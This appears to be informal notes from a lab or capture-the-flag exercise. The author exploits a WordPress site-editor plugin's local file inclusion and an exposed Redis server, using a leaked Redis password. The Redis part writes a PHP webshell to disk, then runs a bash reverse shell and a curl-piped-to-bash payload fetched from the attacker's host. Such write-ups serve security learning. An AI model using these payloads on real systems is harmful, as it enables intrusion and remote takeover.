Exploitation

The site-editor plugin is vulnerable to lfi

[+] site-editor
 | Location: http://192.168.135.166/wp-content/plugins/site-editor/
 | Latest Version: 1.1.1 (up to date)
 | Last Updated: 2017-05-02T23:34:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.1.1 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.135.166/wp-content/plugins/site-editor/readme.txt

Possible ways to go about this

find config file for the wordpress site which could get us access to the site and uploading a malicious cred

get a hand of hte creds for redis and see what we can do from there

# Require clients to issue AUTH <PASSWORD> before processing any other
# commands.  This might be useful in environments in which you do not trust
# others with access to the host running redis-server.
#
# This should stay commented out for backward compatibility and because most
# people do not need auth (e.g. they run their own servers).
#
# Warning: since Redis is pretty fast an outside user can try up to
# 150k passwords per second against a good box. This means that you should
# use a very strong password otherwise it will be very easy to break.
#
requirepass Ready4Redis?

192.168.135.166:6379> AUTH Ready4Redis?
OK
192.168.135.166:6379> info
# Server
redis_version:5.0.14
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:ddd3b1f304a7d4d5
redis_mode:standalone
os:Linux 4.19.0-18-amd64 x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:8.3.0
process_id:483
run_id:43b1f5fed3d5c1a189b903ab9c174e00d8b22c48
tcp_port:6379
uptime_in_seconds:4279
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:15476870
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf

# Clients
connected_clients:17
client_recent_max_input_buffer:2
client_recent_max_output_buffer:0
blocked_clients:0

# Memory
used_memory:1807944
used_memory_human:1.72M
used_memory_rss:9482240
used_memory_rss_human:9.04M
used_memory_peak:1951488
used_memory_peak_human:1.86M
used_memory_peak_perc:92.64%
used_memory_overhead:1608274
used_memory_startup:796248
used_memory_dataset:199670
used_memory_dataset_perc:19.74%
allocator_allocated:1851160
allocator_active:2301952
allocator_resident:4673536
total_system_memory:2092335104
total_system_memory_human:1.95G
used_memory_lua:41984
used_memory_lua_human:41.00K
used_memory_scripts:0
used_memory_scripts_human:0B
number_of_cached_scripts:0
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
allocator_frag_ratio:1.24
allocator_frag_bytes:450792
allocator_rss_ratio:2.03
allocator_rss_bytes:2371584
rss_overhead_ratio:2.03
rss_overhead_bytes:4808704
mem_fragmentation_ratio:5.63
mem_fragmentation_bytes:7798200
mem_not_counted_for_evict:0
mem_replication_backlog:0
mem_clients_slaves:0
mem_clients_normal:812026
mem_aof_buffer:0
mem_allocator:jemalloc-5.1.0
active_defrag_running:0
lazyfree_pending_objects:0

# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1659639759
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:0
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0

# Stats
total_connections_received:5040
total_commands_processed:177444
instantaneous_ops_per_sec:92
total_net_input_bytes:4845774
total_net_output_bytes:4081753
instantaneous_input_kbps:2.49
instantaneous_output_kbps:2.09
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0

# Replication
role:master
connected_slaves:0
master_replid:3c4f5168a6d09937cc99aa275f22b4e35bb331b1
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:8.754760
used_cpu_user:3.299075
used_cpu_sys_children:0.000000
used_cpu_user_children:0.000000

# Cluster
cluster_enabled:0

# Keyspace
192.168.135.166:6379> 

So although I already tried to export a php file to the /var/www/html direcotry the user does not have write access there, so with the LFI we can find what files we have write acess to, upload the php code and then use lfi to execute the code.

Documentation=http://redis.io/documentation, man:redis-server(1)

[Service]
Type=forking
ExecStart=/usr/bin/redis-server /etc/redis/redis.conf
PIDFile=/run/redis/redis-server.pid
TimeoutStopSec=0
Restart=always
User=redis
Group=redis
RuntimeDirectory=redis
RuntimeDirectoryMode=2755

UMask=113
PrivateTmp=yes
LimitNOFILE=65535
PrivateDevices=yes
ProtectHome=yes
ReadOnlyDirectories=/
ReadWritePaths=-/var/lib/redis
ReadWritePaths=-/var/log/redis
ReadWritePaths=-/var/run/redis


NoNewPrivileges=true
CapabilityBoundingSet=CAP_SETGID CAP_SETUID CAP_SYS_RESOURCE
MemoryDenyWriteExecute=true
ProtectKernelModules=true
ProtectKernelTunables=true
ProtectControlGroups=true
RestrictRealtime=true
RestrictNamespaces=true
RestrictAddressFamilies=AF_INET AF_INET6 AF_UNIX

# redis-server can write to its own config file when in cluster mode so we
# permit writing there by default. If you are not using this feature, it is
# recommended that you replace the following lines with "ProtectSystem=full".
ProtectSystem=true
ReadWriteDirectories=-/etc/redis
ReadWriteDirectories=-/opt/redis-files

[Install]
WantedBy=multi-user.target
Alias=redis.service
{"success":true,"data":{"output":[]}}

Based on this I tried to get an interactive shell but was unable to for some reason however with this commands and navigating to them I was able to execute commands.

192.168.135.166:6379> config set dbfilename redisss.php
OK
192.168.135.166:6379> set test "<?php system('whoami'); ?>"
OK
192.168.135.166:6379> save

Created a shell that will get executed when I execute the curl command on redis and navigate to it with the lfi.

#!/bin/bash

bash -i >& /dev/tcp/192.168.49.135/80 0>&1

This is the payload that i used.

set test "<?php system('curl http://192.168.49.135:22/shell.sh | bash'); ?>"